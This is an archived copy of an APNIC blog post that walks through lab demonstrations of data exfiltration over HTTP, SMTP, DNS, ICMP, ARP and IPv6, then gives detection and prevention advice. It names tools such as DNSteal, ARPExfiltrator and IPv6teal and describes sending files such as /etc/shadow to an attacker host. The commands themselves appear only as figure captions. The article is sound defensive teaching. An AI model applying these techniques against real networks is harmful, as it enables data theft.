{
	"id": "f9e8ea46-3058-4778-9d31-30c34af2b0cd",
	"created_at": "2026-04-06T00:10:05.062228Z",
	"updated_at": "2026-04-10T13:11:40.686007Z",
	"deleted_at": null,
	"sha1_hash": "0641f21d0b2feb24c2528c25671cf5ece33a9ed3",
	"title": "How to: Detect and prevent common data exfiltration attacks | APNIC Blog",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3051127,
	"plain_text": "How to: Detect and prevent common data exfiltration attacks |\r\nAPNIC Blog\r\nPublished: 2022-03-30 · Archived: 2026-04-05 14:42:32 UTC\r\nPhoto: No Access by Bob Shand, Flickr\r\nData exfiltration is a technique used by malicious actors to carry out an unauthorized data transfer from a\r\ncomputer resource. Data exfiltration can be done remotely or locally and can be difficult to detect from normal\r\nnetwork traffic.\r\nTypes of data that are targeted include: Usernames, associated passwords and other system authentication-related\r\ninformation, cryptographic keys, financial records, information associated with strategic decisions, and mailing\r\naddresses with content or what is valuable data for a cyber attacker. The damages can immeasurable when the\r\norganization’s most valuable data is in the hand of a cyber attacker.\r\nAdvanced Persistent Threats (APTs) are one form of cyberattack in which data exfiltration is often a primary goal.\r\nThe goal of an APT is to gain access to a network, but remain undetected as it stealthily seeks out the most\r\nvaluable or target data.\r\nUsually, attackers use covert channels for data exfiltration because covert channels are usually very difficult to\r\ndetect due to their ability to use existing legitimate connections or protocols. A covert channel is a method of data\r\ntransfer between two parties (usually a malicious insider and a malicious outsider) over a medium that is not\r\nsupposed to be allowed to communicate by the computer security policy. The Trusted Computer System\r\nEvaluation Criteria (TCSEC) defines two kinds of covert channels:\r\nStorage channels, which communicate by modifying a ‘storage location’, such as a hard drive.\r\nTiming channels, which perform operations that affect the ‘real response time observed’ by the receiver.\r\nUnfortunately, an attacker does not need to use advanced tools to exfiltrate data. They can use very simple\r\ntechniques for stealing and transferring data from an internal network to an attacker domain such as\r\nHTTP/HTTPS, SMTP, DNS, SMTP, P2P, VPN or even the ARP method for data exfiltration. For example, the\r\nhttps://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/\r\nPage 1 of 13\n\nMITRE ATT\u0026CK framework exfiltration tactic (TA0010) describes how an attacker can take data collected within\r\na target network and exfiltrate it outside the network to systems under the attacker’s control.\r\nIn this post, I will review a few common data exfiltration techniques in a lab environment. I will also highlight the\r\nbest practices for detecting and preventing data exfiltration attacks.\r\nNote: All the cases in this post were tested in a sandbox environment for educational purposes only. The site\r\nowners, publisher and the author cannot be held responsible for any damages caused.\r\nIn the post ‘Target Data’ means malicious actors want to steal, copy and transfer to the attacker command and\r\ncontrol (C\u0026C) channel or an alternative channel.\r\nHypertext Transfer Protocol (HTTP)\r\nAttackers often use HTTP to exfiltrate data because this traffic is very common in enterprise networks and is\r\nalways permitted. The high volume of HTTP traffic traversing enterprise networks can allow attackers to hide\r\ntheir evil motivation and allow data mixing with legitimate traffic.\r\nPOST is an HTTP method designed to send data to the server from an HTTP client. The HTTP POST method\r\nrequests the web server to accept the data enclosed in the body of the POST message. It is often used when\r\nuploading a file or when submitting a completed web form. Usually, there is no limit to the amount of data that\r\ncan be transferred using this method, except the limit imposed by the web server — if the file size is too large for\r\nthe web server to handle in a single POST request, it can be split up and sent in multiple requests.\r\nAttackers can configure the web server to respond to only specific types of requests, which allows attackers to\r\nremain stealthy. For example, the server only accepts requests from specific user-agents that are only known by\r\nthe attacker.\r\nRising Sun is a modular backdoor malware that can send data gathered from the infected machine via an HTTP\r\nPOST request to the command and control (C2) server. This malware has been observed targeting nuclear,\r\ndefence, energy, and financial service companies across the world.\r\nThe following basic example of data exfiltration (Figures 1-7) relies on HTTP POST. The lab environment\r\nconsists of one server as an HTTP web server with logging capabilities, and another that is considered a\r\ncompromised host, which will send the stolen data using the compromised system’s available tools without\r\ninstalling any additional software. One such tool is cURL, which is a library and command-line tool for\r\ntransferring data using various protocols. When used for data exfiltration processes, cURL can POST a file to an\r\nattacker’s web server from a compromised linux host, as shown in Figure 1:\r\nFigure 1 — cURL command for POST file to attacker server.\r\nhttps://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/\r\nPage 2 of 13\n\nThe attacker can then listen and capture the incoming ‘Exfil Data’, as shown in Figure 2:\r\nFigure 2 — Attacker server response with cURL POST command executed from the victim host.\r\nIf the victim host is a Windows platform, the attacker can use the PowerShell command to send a file using the\r\nHTTP POST method over TCP port 80, as shown in Figure 3:\r\nFigure 3 — PowerShell code for HTTP POST from the victim host.\r\nThe attacker server response with the above command is shown in Figure 4:\r\nFigure 4 — HTTP POST received from the victim to the attacker listing server.\r\nAttackers can even encrypt or compress the target data before sending it to their server (Figure 5). Most of the\r\ntime this is considered as ‘stealth exfiltration’ because it seems to be legitimate traffic and usually raises no alarm\r\nto monitoring systems.\r\nhttps://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/\r\nPage 3 of 13\n\nFigure 5 — Victim host to attacker control system communication with encrypted Payload using\r\nHTTP POST.\r\nAfter the PowerShell code is executed, the following HTTP POST, along with encrypted payload/data requests,\r\nare sent to the attacker’s server (Figure 6).\r\nFigure 6 — HTTP POST along with encrypted payload received from the victim to the attacker\r\nlisting server.\r\nDecrypting the data is an easy job for an attacker as they know the key (Figure 7).\r\nFigure 7 — Encrypted payload/data decryption.\r\nThe Simple Mail Transfer Protocol (SMTP)\r\nSMTP is one of the most common methods for data exfiltration. Several malware programs exfiltrate the stolen\r\ninformation to an attacker-controlled SMTP server. For example Agent Tesla is a Windows-based keylogger\r\nand Remote Access Trojan (RAT) commonly uses SMTP to exfiltrate stolen data.\r\nhttps://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/\r\nPage 4 of 13\n\nAttackers can use the following PowerShell code (Figure 8) to send an email with an attached file (stolen data) to\r\nexfiltrate a remote address:\r\nFigure 8 — Victim host sends stolen data to the attacker-controlled email box using SMTP.\r\nFigure 9 shows the ‘Successful Email Delivered’ to the attacker’s email box:\r\nFigure 9 — Exfiltrated data delivered to attacker’s email box.\r\nThe related SMTP streams are shown in Figure 10:\r\nFigure 10 — SMTP streams.\r\nDomain Name System (DNS)\r\nThe DNS is the hierarchical and decentralized naming system used to identify computers, services, and other\r\nresources reachable through the Internet or other Internet Protocol (IP) networks. This protocol works through\r\nTCP/UDP port 53 by default and is used only to exchange specific data.\r\nDuring the exfiltration phase, the attacker makes a DNS query (initiates a domain name resolution request) to an\r\nexternal DNS server address. Such requests are not usually blocked by security perimeters. Without responding\r\nhttps://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/\r\nPage 5 of 13\n\nwith an A record in response, the attacker’s name server will respond with CNAME/MX or a TXT record that\r\nallows the data to be sent between them and the victim.\r\nThe attacker can then use the following tools to extract files:\r\nDNSMessenger is a RAT used to conduct malicious PowerShell commands on compromised\r\ncomputers. DNSteal is a tool that creates a fake DNS server that allows attackers to stealthily extract files\r\nfrom a victim machine through DNS requests. This tool also supports Gzip file compression.\r\nFigure 11 shows the attacker running the DNSteal tool with a -z parameter (transferred file was\r\ncompressed/zipped by default in their attacker-controlled name server):\r\nFigure 11 — The DNSteal tool showing the attacker’s name system.\r\nFrom the victim system (Figure 12), it tries to send the targetdata.txt file over the DNS connection using the\r\nfollowing command:\r\nFigure 12 — The victim system sends the targetdata.txt file over the DNS.\r\nFinally, the attacker’s name server receives the target data (Figure 13).\r\nhttps://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/\r\nPage 6 of 13\n\nFigure 13 — The attacker’s name server receives the target data using DNS as a communication\r\nprotocol.\r\nInternet Control Message Protocol (ICMP)\r\nICMP is a supporting protocol in the Internet protocol suite and is widely known for its applications such as ping\r\nor traceroute. Malicious actors can use ICMP to exfiltrate data, by taking advantage of organizations that allow\r\noutbound ICMP traffic. A common example of this is the Windows malware Pingback, which uses ICMP for its\r\nC2 activities.\r\nMetasploit have a module that will receive the exfiltrated data over ICMP from the victim host. For exfiltrated\r\ndata, it needs a tool name Nping (Nping comes with Nmap). The Metasploit module server-side component\r\nreceives and stores files exfiltrated over ICMP echo request packets.\r\nFigure 14 shows the Metasploit listener machine on the attacker’s side, following the load and run module:\r\nFigure 14 — Metasploit module load and run for ICMP ping replies from the victim.\r\nFigure 15 shows an example of the victim host using the following command:\r\nhttps://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/\r\nPage 7 of 13\n\nFigure 15 — Victim uses the Nping tool to send stolen data using ICMP.\r\nIn the first command, Nping will send data via ICMP. This will show up as stoleninfo.txt in the attacker’s\r\nmachine. The second command sends the target data and final packets containing the ‘EOF’ string. This tells the\r\nMetasploit module that data exfiltration over ICMP is completed.\r\nIn the attacker Metasploit module (Figure 16) we found the following:\r\nFigure 16 — Exfiltrated data stored in the attacker machine using ICMP.\r\nThe packet capture shows data is transferred via the ICMP protocol (Figure 17):\r\nhttps://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/\r\nPage 8 of 13\n\nFigure 17 — ICMP data exfiltration packet capture.\r\nAddress Resolution Protocol (ARP)\r\nARP is a communication protocol used for discovering link-layer addresses, such as a MAC address, associated\r\nwith a given Internet layer address. The ARP protocol also allows data to be transferred in local networks (outside\r\nthe Local Area Network (LAN) it will not work).\r\nAn attacker can exfiltrate data via the ARP protocol using ARPExfiltrator. This tool has two parts:\r\n1. Sender script, which runs on the victim machine.\r\n2. Receiver script, which runs on the attacker’s machine with root privilege.\r\nThe sender encodes the string buffer using the base64 algorithm and sends each letter of the encoded string as a\r\nnetwork IPv4 address. The receiver matches each letter with a shared list of IPv4 addresses and decodes the\r\nreceived base64 encoded string.\r\nThe process starts with a ‘receiver script’ on the attacker’s machine (Figure 18):\r\nFigure 18 — ‘Receiver script’ running on the attacker’s machine.\r\nThe victim host then tries to send the /etc/shadow file using the sender script (Figure 19):\r\nhttps://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/\r\nPage 9 of 13\n\nFigure 19 — Victim sends /etc/shadow content to the attacker host using ARPExfiltrator.\r\nThe attacker server receives the stolen data from the victim using ARPExfiltrator (Figure 20):\r\nFigure 20 — Attacker server listens for exfiltrated data over ARP.\r\nThe sender script enables a 1 command in ARP Opcode — the Opcode field in the ARP message specifies the\r\nnature of the ARP message where 1 is for the ARP request and 2 is for the ARP reply. This results in a huge\r\nnumber of ARP request messages being sent in the LAN, as can be seen in Figure 21:\r\nFigure 21 — ARP request operation code.\r\nExfiltration using IPv6\r\nhttps://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/\r\nPage 10 of 13\n\nIPv6teal is a Python 3 tool that exfiltrates data from an internal network using a covert channel built on top of the\r\nIPv6 header flow label field.\r\nA flow is a group of packets, for example, a TCP session or a media stream. The special flow label 0 means the\r\npacket does not belong to any flow. The purpose of the flow label is to maintain the sequential flow of the packets\r\nbelonging to a communication. The source labels the sequence to help the router identify that a particular packet\r\nbelongs to a specific flow of information. Basically, it is designed to avoid reordering of data packets.\r\nThe IPv6teal tool can build a covert channel by storing data to exfiltrate in this field. The exfiltration script sends\r\none IPv6 packet per 20-bits of data, and the receiver script reconstructs the data by reading this field. The payload\r\nof every IPv6 packet sent contains a magic value, along with a sequence number, so the receiving end can\r\ndetermine which IPv6 packets are relevant for it to decode.\r\nFigure 22 shows the IPv6teal ‘sender script’ running on a victim host:\r\nFigure 22 — IPv6teal ‘sender script’ running on a victim host.\r\nFigure 23 shows the ‘IPv6teal receiver script’ running on the attacker-controlled machine; it is trying to listen and\r\ncapture the targeted data:\r\nFigure 23 — ‘IPv6teal receiver script’ and related streams.\r\nBest practices for detecting data exfiltration\r\nDetecting data exfiltration can be a difficult task and depends largely on the type of attack method used. Cyber\r\nattackers use various sophisticated techniques, including various legitimate processes that are more difficult to\r\ndetect. Consequently, analysts can mistakenly mark the data exfiltration traffic as regular network traffic.\r\nTo detect the presence of a malicious actor, more and more organizations are using automated tools that detect in\r\nreal-time malicious or unusual traffic automatically. The Security Information and Event Management System\r\n(SIEM) is one such tool that can monitor network traffic in real-time. Some SIEM solutions can even detect\r\nmalware being used to communicate with C2 servers.\r\nOther best practices include:\r\nhttps://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/\r\nPage 11 of 13\n\nMonitoring for outbound traffic patterns as malware needs to regularly communicate with C2 servers to\r\nmaintain a consistent connection. Continuous monitoring provides opportunities to detect data exfiltration\r\nwith common protocols such as HTTP:80 or HTTPS:443. It’s worth keeping in mind that some advanced\r\nmalware randomize delays between C2 communications.\r\nMonitoring the volume and frequency of data transmission by organization users over email. To do\r\nthis we first need to calculate the average amount of data that internal users send per day. If this average\r\ndata size is exceeded (say by 5 or 10 times), this triggers an alert to be investigated.\r\nKeeping an up-to-date log of all approved IP addresses connections to compare against all new\r\nconnections. Along with this, it’s advised to keep an eye out for large data flows to unexpected IP\r\naddresses and major spikes in anomalous outbound traffic.\r\nMost of these practices require searching for known attack signatures and anomalies. From this information,\r\nanalysts can also build out the entire sequence of an event and map them to a known attack framework.\r\nBest practices for preventing data exfiltration\r\nWe can divide most effective preventive measures into three categories: Preventative, Detective, and Investigative.\r\nFor example, we should ensure that only known acceptable services are permitted into the network. If suspicious\r\nnetwork services are running then effective detective controls can trigger alerts, so analysts can investigate and\r\ntake the appropriate measures immediately.\r\nPreventative controls include: implementing and maintaining technical controls like ACL; deception techniques;\r\nencryption of data in process, transit, and at rest; host-based auditing for identified security weaknesses; and\r\nremediation.\r\nInvestigative controls include various forensics actions as well as gathering intelligence operations, so security\r\nteams can improve their knowledge base and create a custom detection system that meets organizational-unique\r\nrisk profiles.\r\nThe following are a few easy methods to prevent data exfiltration from occurring in your network:\r\nEmployee terminations: The Computer Emergency Response Team (CERT) at the Software Engineering\r\nInstitute of Carnegie Mellon University produced a paper showing that employees were more likely to\r\nengage in data exfiltration when they anticipated imminent termination. Prohibiting an employee’s access\r\nto IT systems should happen immediately whenever an employee’s contract is over/ended/terminated. The\r\nsame is true of business partners or vendors.\r\nBlock unauthorized communication channels: First, disable all unauthorized communication channels,\r\nports and protocols by default, and re-enable on an as-needed basis.\r\nCreate a baseline of normal data flows: This includes amounts of data accessed or transferred, and\r\ngeographical locations of access against which to compare abnormal behaviours.\r\nInstall proper technical controls to prevent phishing attacks: This also requires educating users about\r\nhow phishing attacks work, how to detect them, and what to do when they believe they are facing one.\r\nDevelop Data Loss Prevention (DLP) solutions: DLP technology can analyse the content of all data\r\ntransfers to check for sensitive information against pre-existing policies to detect suspicious activity. This\r\nhttps://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/\r\nPage 12 of 13\n\ncombined with with logging can increase the transparency of organizational data access and movement.\r\nImplement data encryption and data backup processes: Data encryption is a security method where\r\ninformation is encoded and can only be accessed or decrypted by a user with the correct encryption key.\r\nEncrypted data, also known as ciphertext, appears scrambled or unreadable to a person or entity accessing\r\nit without permission. Without a key, attackers have no way of understanding and using the data. Data\r\nbackups help restore lost data and resume operations while the data exfiltration attack is being investigated.\r\nEncryption provides some protection by preventing access to data by bad actors.\r\nImplement proper technical control: Restrict and monitor ingress and egress to machines in the\r\norganization using networking rules, implement Identity and Access Management (IAM), set up bastion\r\nhosts, use granular permissions, and grant access to sensitive data only to those whose job function requires\r\nit.\r\nIn summary, reviewing common data exfiltration attack techniques can help analyse possible attack surfaces and\r\nrelated detection capabilities. It also helps to improve the threat hunting posture for an analyst, because detecting\r\nany instances of data exfiltration as early as possible gives victims a chance to minimize the impact of a breach.\r\nDebashis Pal is an Information Security Specialist from Bangladesh.\r\nThe views expressed by the authors of this blog are their own and do not necessarily reflect the views of APNIC.\r\nPlease note a Code of Conduct applies to this blog.\r\nSource: https://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/\r\nhttps://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.apnic.net/2022/03/31/how-to-detect-and-prevent-common-data-exfiltration-attacks/"
	],
	"report_names": [
		"how-to-detect-and-prevent-common-data-exfiltration-attacks"
	],
	"threat_actors": [],
	"ts_created_at": 1775434205,
	"ts_updated_at": 1775826700,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0641f21d0b2feb24c2528c25671cf5ece33a9ed3.pdf",
		"text": "https://archive.orkl.eu/0641f21d0b2feb24c2528c25671cf5ece33a9ed3.txt",
		"img": "https://archive.orkl.eu/0641f21d0b2feb24c2528c25671cf5ece33a9ed3.jpg"
	}
}